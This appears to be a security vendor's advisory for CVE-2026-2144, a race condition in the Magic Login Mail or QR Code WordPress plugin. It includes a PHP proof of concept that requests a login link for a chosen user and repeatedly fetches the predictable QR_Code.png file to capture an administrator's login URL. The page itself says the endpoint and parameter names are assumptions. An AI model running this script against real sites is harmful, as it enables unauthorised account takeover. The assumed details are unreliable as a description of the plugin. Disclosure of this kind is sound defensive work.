Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2144: Magic Login Mail or QR Code <= 2.05 – Unauthenticated Privilege Escalation via Insecure QR Code File Storage (magic-login-mail)

CVE ID CVE-2026-2144
Plugin magic-login-mail
Severity High (CVSS 8.1)
CWE 269
Vulnerable Version 2.05
Patched Version
Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2144 (metadata-based):
The Magic Login Mail or QR Code plugin for WordPress contains an unauthenticated privilege escalation vulnerability. The flaw exists in the plugin’s QR code generation and email dispatch logic. Attackers can exploit a race condition to hijack a one-time login link intended for any user, including administrators, leading to full account compromise.

Atomic Edge research identifies the root cause as improper privilege management (CWE-269). The vulnerability description confirms the plugin creates a predictable file named QR_Code.png in the public uploads directory during the email sending process. The file contains the login URL encoded in the QR code. The plugin only deletes this file after the wp_mail() function completes. This sequence creates a race condition window where the file is publicly accessible. This analysis infers the plugin likely uses a hook like wp_ajax_nopriv_ to handle unauthenticated login link requests, as the description states attackers can trigger a request for any user.

Exploitation requires two concurrent steps. First, an attacker sends a request to the plugin’s unauthenticated AJAX endpoint, likely /wp-admin/admin-ajax.php, with an action parameter such as magic_login_mail_request_link and a target user parameter like user_email or user_id. This triggers the generation of the QR_Code.png file. Second, the attacker must rapidly and repeatedly request the predictable file URL, /wp-content/uploads/{year}/{month}/QR_Code.png, during the brief window before deletion. Successful retrieval of the image allows decoding of the QR code to extract the login URL, granting immediate access to the targeted account.

Remediation requires eliminating the insecure temporary file storage. The patched version likely removed the file-based QR code generation step from the email sending workflow. A secure fix would generate the QR code image in memory and attach it directly to the email without writing to the filesystem. Alternatively, the plugin could generate a cryptographically random, unguessable filename and implement immediate file cleanup with a proper exception handler to ensure deletion even if wp_mail() fails.

The impact of successful exploitation is severe. An unauthenticated attacker can gain administrative access to a WordPress site. This leads to complete site takeover, allowing installation of backdoors, theme/plugin editing, user creation or deletion, and data exfiltration. The attack chain is reliable if the attacker can win the race condition, which network latency and automated tools can facilitate.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2144 - Magic Login Mail or QR Code <= 2.05 - Unauthenticated Privilege Escalation via Insecure QR Code File Storage

<?php

$target_url = 'http://vulnerable-site.com'; // CHANGE THIS
$target_user_email = 'admin@vulnerable-site.com'; // CHANGE THIS

// Step 1: Trigger the login link request to generate the QR code file.
// Assumption: The plugin uses an AJAX handler with a 'magic_login_mail_request_link' action.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
    'action' => 'magic_login_mail_request_link',
    'user_email' => $target_user_email // Assumed parameter name
];

$ch = curl_init($ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 5); // Short timeout to fire and forget
$response = curl_exec($ch);
curl_close($ch);

echo "[*] Triggered login request for: $target_user_emailn";

// Step 2: Race to fetch the predictable QR code file.
// Assumption: File is stored in the standard WordPress uploads directory for the current month.
$upload_path = '/wp-content/uploads/' . date('Y') . '/' . date('m') . '/';
$predictable_filename = 'QR_Code.png';
$file_url = $target_url . $upload_path . $predictable_filename;

echo "[*] Attempting to fetch: $file_urln";

$attempts = 50;
for ($i = 0; $i < $attempts; $i++) {
    $ch = curl_init($file_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_NOBODY, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 2);
    $file_content = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($http_code === 200 && !empty($file_content)) {
        file_put_contents('captured_qr.png', $file_content);
        echo "[+] SUCCESS: Captured QR code to 'captured_qr.png'. Decode this image to extract the login URL.n";
        exit(0);
    }
    usleep(50000); // 50ms delay between attempts
}

echo "[-] Failed to capture the QR code file within $attempts attempts.n";

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School